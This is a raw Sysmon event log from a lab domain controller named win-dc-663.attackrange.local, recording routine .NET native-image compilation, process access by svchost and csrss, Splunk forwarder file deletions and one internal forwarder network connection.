21:02:48.144{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F2B-60D3-C600-00000000CF01}4680C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61efc|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000019747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:48.144{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A178-60D3-0803-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.113{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A178-60D3-0803-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:48.113{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A178-60D3-0803-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000019744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.277{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61397-false10.0.1.12-8000- 10341000x800000000000000019743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:48.051{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A178-60D3-0703-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.019{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A178-60D3-0703-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:48.019{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A178-60D3-0703-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.004{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB759303FCC590B5D283A2ABF16F77F8,SHA256=AB2F80BD4E66F00AC95B18D3EA7FA915980E19D8034084A2B01E4505138EA721,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:49.754{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=204210C552E51A4B767F849A7290EE77,SHA256=D24A95FAAFE2F2BABD819239B24770011C326C71D6A9E78F77B8A7AE97E25702,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:49.098{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A179-60D3-0A03-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:49.082{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A179-60D3-0A03-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:49.082{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A179-60D3-0A03-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:49.019{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=045FB30CA09E55B0BE293C3A9E045EF7,SHA256=761A145A82DB5144875EB0300E8D6361E7F30CA3D94DEB285B852A8F70600851,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.968{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17A-60D3-0F03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.953{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A17A-60D3-0F03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:50.953{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17A-60D3-0F03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.874{4DB9351A-A17A-60D3-0E03-00000000CF01}6512NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\A85344AH8L\System.Configuration.Install.ni.dll.auxMD5=66A5D6A518D673D91B07970E39A615C9,SHA256=48CDB45F5BB50657F1E096A1A785CF6603009B01A3D723F81A8E3E4284233E37,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.874{4DB9351A-A17A-60D3-0E03-00000000CF01}6512NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\A85344AH8L\System.Configuration.Install.ni.dllMD5=B755C1222F499DEC3761B2043A8AD309,SHA256=0D5ABE3783AC66E16D0158045499C4F46E38E994E93A1C860BB040EDACA85FF0,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:50.859{4DB9351A-A17A-60D3-0E03-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1970-0\System.Configuration.Install.dll2021-06-23 21:02:50.859 10341000x800000000000000019780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17A-60D3-0E03-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:50.671{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A17A-60D3-0E03-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.671{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17A-60D3-0E03-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:50.469{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17A-60D3-0D03-00000000CF01}4980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.437{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A17A-60D3-0D03-00000000CF01}4980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:50.437{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17A-60D3-0D03-00000000CF01}4980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.374{4DB9351A-A17A-60D3-0C03-00000000CF01}3860NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MTYPYA5NLE\CustomMarshalers.ni.dll.auxMD5=A2AB2FCA847D5A56A6CBC60C30746E57,SHA256=A2BAAB933EB75B68F913C983F22A8940DF435BF948775140CEDE51AC4095A368,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.374{4DB9351A-A17A-60D3-0C03-00000000CF01}3860NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MTYPYA5NLE\CustomMarshalers.ni.dllMD5=AF7ADECB9CC4D188412413B4CA9E0E61,SHA256=46AB95E9C4B39D1D65A08ED2047903F2A03D266260234F58EBC7F6AC3246E111,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:50.359{4DB9351A-A17A-60D3-0C03-00000000CF01}3860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f14-0\CustomMarshalers.dll2021-06-23 21:02:50.359 10341000x800000000000000019771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 